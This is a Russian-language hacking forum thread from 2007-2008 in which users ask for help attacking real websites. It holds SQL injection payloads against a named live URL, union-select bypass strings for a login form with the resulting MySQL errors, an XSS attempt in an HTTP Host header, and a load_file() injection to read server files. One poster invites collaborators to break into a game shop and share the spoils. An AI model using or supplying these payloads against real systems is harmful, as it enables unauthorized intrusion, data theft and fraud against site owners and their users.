Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Уверен
     
  2. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Для меня остается не понятной одна весЧь.

    HTML:
    http://www.mxftk.com/pub/page.php?id=-47
    id=-47 - показывает главную страницу

    id=47+order+by+10000/* - страницу отображает правильно.

    Внимание! Впрос:) Можно ли както подобрать количество столбцов?
     
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    trumps, там нет инъекции.
     
    2 people like this.
  4. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Понятно :( . Спасибо.
     
  5. Grimcho

    Grimcho New Member

    Joined:
    7 Jan 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Возник вопрос ...

    У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
     
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Смотря что в них кроме сессии есть.
     
  7. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Что-нибудь, сделать можно). Это зависит от того кто дал тебе куки(какой двиг,форум).
     
  8. Grimcho

    Grimcho New Member

    Joined:
    7 Jan 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Значит содержание cookies может быть различным в зависимости от форума? Если можно чуток по подробнее об этом.
     
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Куки сдержат временную информацию, которую оставляет у тебя на компе форум/сайт/вообще скрипт. Это может быть:
    пароль
    логин
    сессия
    счетчик посещений
    и всё что угодно остальное :)
     
  10. Grimcho

    Grimcho New Member

    Joined:
    7 Jan 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    С каким софтом происходит извлечение? (Cookie Editor?? )
     
  11. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Что за извлечение??? Откуда куда?
    В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).
     
  12. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    в осле нет
     
  13. NilsonUA

    NilsonUA Elder - Старейшина

    Joined:
    25 Nov 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    2
    Вобщем проблема с раскрытием скули в логине
    есть сайт http/site/login.php
    Поля мыло и пасс. Реагируют на кавычку обычную в логине, но как дальше быть? Пишет про некорректный запрос и все!

    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 0x78617861'' at line 1

    select osc_email_addr from osc_activation where osc_activation=0 and osc_email_addr=''select 0x78617861'

    [TEP STOP]

    хэлп плз
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    введи:
    '/**/union/**/select/**/'xaxa

    а лучше:
    '/**/union/**/select/**/1/*
     
  15. NilsonUA

    NilsonUA Elder - Старейшина

    Joined:
    25 Nov 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    2

    донт ворк, пишет просто неверный логин.

    папка /includes/ открыта для просмотра...

    есть имена всех таблиц, больше принципе нечего не накпал.

    Те кто хочет быть помочь стукайте а асику, все что поимеем поделим(это гейм шоп)
     
  16. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Всем превед,нашёл тот сайтег прикольный гг))

    При скане нашёл такую бадягу- XSS через HTTP:p.

    По дефолтовскому коду дали пример:

    GET /SITE HTTP/1.1
    Host: ivbgj<xscript>XSS</xscript>.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
    Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Connection: Keep-Alive

    P.S.:

    SITE- хост разумееца : )

    Переделал и отправил:

    GET /index.html HTTP/1.1
    Host: SITE<xscript>alert('XSS');</xscript>.ru
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
    Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Connection: Keep-Alive

    Серв либо отвечает,либо,если чё переделать слегка, выходит,что вообще молчание:Р

    Расскажите, что я сделал(или нахимичил хз),а всё никаг.В подробности уязвимости был дан дефолтовский код.

    P.S. Юзил перехватичик+отправщег пакетофф с сайта)(( (Хотя... в HTTP йа нупище,стараюсь=___=).
     
    1 person likes this.
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Host: <указать хост> =)
     
    1 person likes this.
  18. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    GET /index.html HTTP/1.1
    Host: SITE<xscript>alert('XSS');</xscript>.ru
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
    Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Connection: Keep-Alive

    ты отправляешь в никуда
     
    2 people like this.
  19. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Он отправляет на сайт SITE<xscript>alert('XSS');</xscript>.ru и запрашивает index.html =\
     
  20. timlame

    timlame Elder - Старейшина

    Joined:
    19 Nov 2007
    Messages:
    34
    Likes Received:
    5
    Reputations:
    0
    Помогите чем можете.
    Есть сайт, на нем скуль инъекция.
    site.ru/news.php?id=-1+union+select+1,2,333,444,5,6,7,8,9,10/*

    выводятся столбцы 3 и 4

    делаю так site.ru/news.php?id=-1+union+select+1,2,load_file('some_file'),444,5,6, 7,8,9,10/* - вылетает ошибка
    делаю site.ru/news.php?id=-1+union+select+1,2,load_file(char(тут числа)),444,5,6,7,8,9,10/* - пустота, т.е. никаких ошибок не вылетает, просто вместо столбца 3 пустота ( в чем гемор ??
    доступа к information_schema нет
    на сайте нет форумов, нашел админку site.ru/admin/ , там доступ закрыт через .htacces

    что посоветуете господа ?
     
Thread Status:
Not open for further replies.